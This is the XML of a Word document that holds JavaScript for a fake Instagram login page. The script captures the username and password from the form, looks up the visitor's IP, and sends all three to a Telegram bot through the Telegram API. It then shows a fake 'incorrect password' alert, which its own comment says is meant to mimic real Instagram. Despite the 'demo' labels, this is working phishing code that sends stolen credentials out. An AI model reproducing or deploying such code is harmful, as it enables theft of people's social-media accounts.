      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = services[tried];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00958F8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fetch(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D30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.then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9BFC2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    if (!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>res.ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>) throw new Error('network error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11260068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        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>res.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA56D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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13AB2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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43997957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 xml:space="preserve">                            let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.origin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || 'unknown';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0E2B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    callback(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75962D5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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57537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.catch(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A518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    tried++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04876D16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        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>tryNext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7096D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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56C81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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847C180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tryNext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7117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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC68E8D" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28577C2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send message to Telegram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42E89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function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>sendToTelegram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>, username, password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0DAF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const message = `</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> *Instagram Login Attempt*%0A</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👤</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> *Username:* ${username || '(empty)'}%0A</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> *Password:* ${password || '(empty)'}%0A</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> *IP:* ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || 'unknown'}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C2857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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&amp;text=${message}&amp;parse_mode=Markdown`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE474D0" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466215E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// Use fetch to send (no blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEFC7B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fetch(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD8E2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.then(response =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>response.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D40DE6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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6225D0D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if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC9F9A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    console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> Telegram sent');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CA69C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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310880F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        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>console.warn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> Telegram error:', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>data.description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> || 'unknown error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C409C0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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEF76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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44555CF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.catch(err =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>console.warn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> Telegram send failed:', err));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB6A70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>            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EF8D9" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ED4C1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handle form submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DBF9E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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginForm.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('submit', function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFCC406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e.preventDefault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8F9C9" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77938B87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const username = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>usernameInput.value.trim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CAF74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const password = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>passwordInput.value.trim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3E741" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8B9B0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// Basic validation (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>instagram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> style)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC74366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if (!username || !password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53714A1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alert('Please fill in both fields.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C342A6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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A6C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2EA3B6" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4B383D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// Disable button to prevent double submit (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B93BB4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loginBtn.disabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17341D1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loginBtn.textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = 'Logging in...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454BE341" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5A0970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// Get IP and send to Telegram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828B27B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getClientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53D346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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>sendToTelegram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>, username, password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD264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// Re-enable button after send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1269C1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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginBtn.disabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FE389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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginBtn.textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = 'Log in';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78D11E" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFB3747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// Show a fake "incorrect" message to mimic real Instagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46846E4B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    alert('Sorry, your password was incorrect. Please double-check your password.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188025E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// Clear password field (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>instagram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFC929" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>passwordInput.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364EAC8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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>passwordInput.focus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018FE00A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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079289F9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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3BAA0" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDB4EB3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Optional: if user presses enter on input, it triggers form submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E66FE8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Also handle "forgot password" link (just demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504087B8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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('.forgot-pw a').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('click', function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A37AAE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e.preventDefault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A64112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alert('Reset link sent to your email (demo)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B43E6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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08D222" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F72145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fb login demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682BA46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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('.fb-login a').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('click', function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5030EE83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e.preventDefault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B04B1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alert('Facebook login is not available in this demo.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F9965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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CA026" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5938753F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// sign up demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6C880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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('.signup-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>cta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> a').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('click', function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776D5CE" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>e.preventDefault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F50A9E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    alert('Sign up page (demo)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A50D84" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>            });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52044AAF" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B1EB3A" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        })();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999C6C6" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B3DF8" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C353B19" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FD113" w14:textId="7128E60D" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006504A5" w:rsidRPr="006504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A5"/>
    <w:rsid w:val="006504A5"/>
    <w:rsid w:val="00F6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D3F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6C0CD479-4BCA-4B9E-92BA-F4950E4F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4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4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4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4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04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04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4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04A5"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Mang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2626</Words>
  <Characters>14969</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>124</Lines>
  <Paragraphs>35</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17560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BISWANATH ROUL</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>BISWANATH ROUL</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-25T07:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-25T07:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>